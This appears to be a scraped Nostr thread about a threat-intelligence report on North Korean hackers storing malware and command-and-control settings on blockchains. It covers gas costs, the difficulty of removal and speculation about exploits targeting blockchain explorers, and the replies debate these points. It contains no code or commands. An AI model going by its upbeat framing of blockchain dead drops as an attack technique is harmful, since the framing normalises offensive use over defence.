+- jsr -- 191d ---------------------------------------------------------------------------------------------------[...]+ | | | NEW: 🇰🇵DPRK hackers have begun hiding malware on blockchain. | | | | Result, decentralized, immutable malware from a government crypto theft operation. | | https://blossom.primal.net/a107de401a522d0914a28dec26d00b96e8444e3d25259e14cfaa04a023b098b4.png | | | | It only cost $1.37 USD in gas fees per malware change (e.g. to update the command & control server) | | | | https://blossom.primal.net/4ba1cadacaac86882f3363c59e5320db53dd97c6a53fe5a689e49387e81eaa36.png | | | | Blockchains as malware dead drops are a fascinating, predictable evolution for nation state attackers. | | | | https://blossom.primal.net/29d96437b500d63006608b3bba6fdf5ae776c29ff697dfb7485b7aafbbbe38e7.png | | | | And Blockchain explorers are a natural target. | | | | https://blossom.primal.net/4a0cb4b61499359f7d3048d03000f6cce432c7211615a8029f1f7515c379de35.png | | | | Nearly impossible to remove. | | https://blossom.primal.net/816dce991b4bd694b9def92d508ae5c35f77df7fd13627ebeb5c8f223e538407.png | | | | Experimentation with putting malware on blockchains is in infancy. | | | | Ultimately there will be some efforts to try and implement social engineering protection around this, but combined | | with things like agentic AI & vibe coding by low-information people...whew boy this gold seam is going to be | | productive for a long time. | | | | Still, where here they used social engineering, I expect attackers to also experiment with directly loading zero | | click exploits onto blockchains targeting things like blockchain explorers & other systems that process | | blockchains... especially if they are sometimes hosted on the same systems & networks that handle transactions / | | have wallets. | | | | REPORT: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding | | | +-- reply ---------------------------------------------------------------------------------------------- [8 replies] ---+NEW: 🇰🇵DPRK hackers have begun hiding malware on blockchain. Result, decentralized, immutable malware from a government crypto theft operation. https://blossom.primal.net/a107de401a522d0914a28dec26d00b96e8444e3d25259e14cfaa04a023b098b4.png It only cost $1.37 USD in gas fees per malware change (e.g. to update the command & control server) https://blossom.primal.net/4ba1cadacaac86882f3363c59e5320db53dd97c6a53fe5a689e49387e81eaa36.png Blockchains as malware dead drops are a fascinating, predictable evolution for nation state attackers. https://blossom.primal.net/29d96437b500d63006608b3bba6fdf5ae776c29ff697dfb7485b7aafbbbe38e7.png And Blockchain explorers are a natural target. https://blossom.primal.net/4a0cb4b61499359f7d3048d03000f6cce432c7211615a8029f1f7515c379de35.png Nearly impossible to remove. https://blossom.primal.net/816dce991b4bd694b9def92d508ae5c35f77df7fd13627ebeb5c8f223e538407.png Experimentation with putting malware on blockchains is in infancy. Ultimately there will be some efforts to try and implement social engineering protection around this, but combined with things like agentic AI & vibe coding by low-information people...whew boy this gold seam is going to be productive for a long time. Still, where here they used social engineering, I expect attackers to also experiment with directly loading zero click exploits onto blockchains targeting things like blockchain explorers & other systems that process blockchains... especially if they are sometimes hosted on the same systems & networks that handle transactions / have wallets. REPORT: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding
thread · root 9b10aac8…af8b · depth 1 · · selected 9b10aac8…af8b
thread
root 9b10aac8…af8b · depth 1 · · selected 9b10aac8…af8b
NEW: 🇰🇵DPRK hackers have begun hiding malware on blockchain.Result, decentralized, immutable malware from a government crypto theft operation.https://blossom.primal.net/a107de401a522d0914a28dec26d00b96e8444e3d25259e14cfaa04a023b098b4.pngIt only cost $1.37 USD in gas fees per malware change (e.g. to update the command & control server)https://blossom.primal.net/4ba1cadacaac86882f3363c59e5320db53dd97c6a53fe5a689e49387e81eaa36.pngBlockchains as malware dead drops are a fascinating, predictable evolution for nation state attackers.https://blossom.primal.net/29d96437b500d63006608b3bba6fdf5ae776c29ff697dfb7485b7aafbbbe38e7.pngAnd Blockchain explorers are a natural target.https://blossom.primal.net/4a0cb4b61499359f7d3048d03000f6cce432c7211615a8029f1f7515c379de35.pngNearly impossible to remove.https://blossom.primal.net/816dce991b4bd694b9def92d508ae5c35f77df7fd13627ebeb5c8f223e538407.pngExperimentation with putting malware on blockchains is in infancy.Ultimately there will be some efforts to try and implement social engineering protection around this, butcombined with things like agentic AI & vibe coding by low-information people...whew boy this gold seam is goingto be productive for a long time.Still, where here they used social engineering, I expect attackers to also experiment with directly loading zeroclick exploits onto blockchains targeting things like blockchain explorers & other systems that processblockchains... especially if they are sometimes hosted on the same systems & networks that handle transactions /have wallets.REPORT: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding
This also a thing using ordinals - gone are the days when you hafta use finicky DNS and ded servers, set a block hash to load remote exploits and yer off!
Woah! That pretty cool.
Are you sure it wast Jameson Lopp?
lol
✍️✍️ https://simplex.chat/contact#/?v=2-7&smp=smp%3A%2F%2F6iIcWT_dF2zN_w5xzZEY7HI2Prbh3ldP07YTyDexPjE%3D%40smp10.simplex.im%2FsYV2mEEBg_35Vyg2-0rW3-Bn9P2CR5ll%23%2F%3Fv%3D1-3%26dh%3DMCowBQYDK2VuAyEAJqIWZVzk9WmEKv7cNlqPM7hXQ2ACwLwWiSiw5uTTywQ%253D%26srv%3Drb2pbttocvnbrngnwziclp2f4ckjq65kebafws6g4hy22cdaiv5dwjqd.onion
This was inevitable with Core v30
nostr:nevent1qqsfky92ep6p2lgqs68v7pwfvcldh985fln2ju42ka7nzzgtfn22lzcpzemhxue69uhhyetvv9ujuurjd9kkzmpwdejhgq3qvz03sm9qy0t93s87qx2hq3e0t9t9ezlpmstrk92pltyajz4yazhsxpqqqqqqzdfay7m
North Korea installs Malware on Bitcoin while it uses Monero to avoid international sanctions.
nostr:nevent1qqsfky92ep6p2lgqs68v7pwfvcldh985fln2ju42ka7nzzgtfn22lzcpzemhxue69uhhyetvv9ujuurjd9kkzmpwdejhg3f8rcr
If explorers are vulnerable:
→ fix explorers.
Not:
→ attack decentralized storage.
The real irony
Blockchains are actually better forensic platforms than the web.
Every malicious payload:
timestamped
indexed
permanent
globally visible
Which makes:
tracking attackers easier, not harder.
One-liner truth
Malware doesn’t become dangerous because of where it’s stored —
it becomes dangerous because of how it’s executed.
nostr:nevent1qqsfky92ep6p2lgqs68v7pwfvcldh985fln2ju42ka7nzzgtfn22lzcpzemhxue69uhhyetvv9ujuurjd9kkzmpwdejhg3f8rcr